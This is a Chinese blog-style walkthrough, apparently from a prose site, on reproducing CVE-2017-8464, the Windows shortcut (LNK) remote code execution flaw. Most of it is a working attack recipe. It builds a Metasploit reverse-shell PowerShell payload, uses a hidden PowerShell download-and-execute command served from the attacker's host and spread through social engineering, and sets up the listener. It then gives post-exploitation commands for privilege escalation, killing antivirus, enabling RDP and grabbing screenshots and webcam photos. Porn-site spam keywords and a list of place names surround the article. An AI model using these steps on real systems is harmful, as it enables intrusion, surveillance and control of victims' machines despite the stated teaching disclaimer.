最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

什么是 CVE-2017-8464 怎么復現(xiàn)

2022-02-15 16:58 作者:天涯客追隨  | 我要投稿

說明:

2017年6月13日,微軟官方發(fā)布編號為CVE-2017-8464的漏洞公告,官方介紹Windows系統(tǒng)在解析快捷方式時存在遠程執(zhí)行任意代碼的高危漏洞,黑客可以通過U盤、網(wǎng)絡共享等途徑觸發(fā)漏洞,完全控制用戶系統(tǒng),安全風險高危

傳播的載體一般是LNK ,LNK是windows系統(tǒng)內(nèi)應用程序快捷方式文件的文件類型后綴名。

危害:

被攻擊機插入存在攻擊lnk的U盤后會反彈shell,哪怕是被隔離的內(nèi)網(wǎng),也可以在不上網(wǎng)的情況下被攻擊。

二、環(huán)境準備:

1 可復現(xiàn)的操作系統(tǒng)版本:

  • Microsoft Windows 10 Version 1607 for 32-bit Systems

  • Microsoft Windows 10 Version 1607 for x64-based Systems

  • Microsoft Windows 10 for 32-bit Systems

  • Microsoft Windows 10 for x64-based Systems

  • Microsoft Windows 10 version 1511 for 32-bit Systems

  • Microsoft Windows 10 version 1511 for x64-based Systems

  • Microsoft Windows 10 version 1703 for 32-bit Systems

  • Microsoft Windows 10 version 1703 for x64-based Systems

  • Microsoft Windows 7 for 32-bit Systems SP1

  • Microsoft Windows 7 for x64-based Systems SP1

  • Microsoft Windows 8.1 for 32-bit Systems

  • Microsoft Windows 8.1 for x64-based Systems

  • Microsoft Windows RT 8.1

2 可復現(xiàn)的服務器系統(tǒng)版本:

  • Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1

  • Microsoft Windows Server 2008 R2 for x64-based Systems SP1

  • Microsoft Windows Server 2008 for 32-bit Systems SP2

  • Microsoft Windows Server 2008 for Itanium-based Systems SP2

  • Microsoft Windows Server 2008 for x64-based Systems SP2

  • Microsoft Windows Server 2012

  • Microsoft Windows Server 2012 R2

  • Microsoft Windows Server 2016

3 kali操作系統(tǒng)

三、利用原理

創(chuàng)建惡意快捷方式,包含惡意執(zhí)行腳本,點擊惡意快捷方式,導致本機中病毒,并且被遠控。

四、實戰(zhàn)利用

啟動MSF

終端內(nèi)輸入:msfconsole

開始利用:

1、使用MSF創(chuàng)建一個后門

msf內(nèi)輸入:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.23 lport=4456 -f psh-reflection>/var/www/html/link.ps1

2、在kali下開啟apache2

終端內(nèi)輸入:service apache2 start

3、通過社會學進行快捷方式傳播

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.204.135/link.ps1');test.ps1"


4 回到MSF終端配置監(jiān)聽

msf內(nèi)輸入: ?use exploit/multi/handler

5 配置payload

set payload windows/x64/meterpreter/reverse_tcp


msf中輸入 : show options ? 配置payload


設置 LHOST ?和 ?LPORT

maf中輸入:

5.1 ?set lhost <當前機器ip> 設置 LHOST

5.2 ?set lport ?<未被占用的端口> ?設置 LPORT


5.3 ?最后在 輸入 show options 查看配置是否生效


6、執(zhí)行監(jiān)聽

msf中輸入 : run 或者 ?exploit


進入靶機執(zhí)行我們在靶機上創(chuàng)建的快捷方式


稍等片刻獲取到meterpreter


五、后滲透

1、通過快捷方式執(zhí)行程序

meterpreter中輸入 ?shell


發(fā)現(xiàn)shell顯示有亂碼

shell內(nèi)輸入 ?chcp 65001


然后進入desktop目錄(這個是win的桌面)

根據(jù)實際情況拼路徑

shell 里輸入:cd users/mb/desktop


2 更多操作

查看進程:ps查看當前進程號:getpid查看系統(tǒng)信息:sysinfo查看目標機是否為虛擬機:run post/windows/gather/checkvm查看完整網(wǎng)絡設置:route查看當前權限:getuid自動提權:getsystem關閉殺毒軟件:run post/windows/manage/killav啟動遠程桌面協(xié)議:run post/windows/manage/enable_rdp列舉當前登錄的用戶:run post/windows/gather/enum_logged_on_users查看當前應用程序:run post/windows/gather/enum_applications抓取目標機的屏幕截圖:load espia ; screengrab抓取攝像頭的照片:webcam_snap查看當前處于目標機的那個目錄:pwd查看當前目錄:getlwd



注意所有操作均在實驗環(huán)境下進行,僅用于教學展示,請勿用于其他渠道 出現(xiàn)任何問題與本up無關!

什么是 CVE-2017-8464 怎么復現(xiàn)的評論 (共 條)

分享到微博請遵守國家法律
微博| 磴口县| 和硕县| 班玛县| 大连市| 驻马店市| 永胜县| 嘉祥县| 富顺县| 丰镇市| 谢通门县| 称多县| 武隆县| 始兴县| 永州市| 深圳市| 通山县| 湘乡市| 泸定县| 河池市| 云梦县| 绩溪县| 康定县| 周口市| 齐河县| 抚远县| 土默特左旗| 阳原县| 札达县| 邓州市| 利辛县| 宝坻区| 冕宁县| 惠来县| 永定县| 长治市| 桂平市| 分宜县| 维西| 毕节市| 庄河市|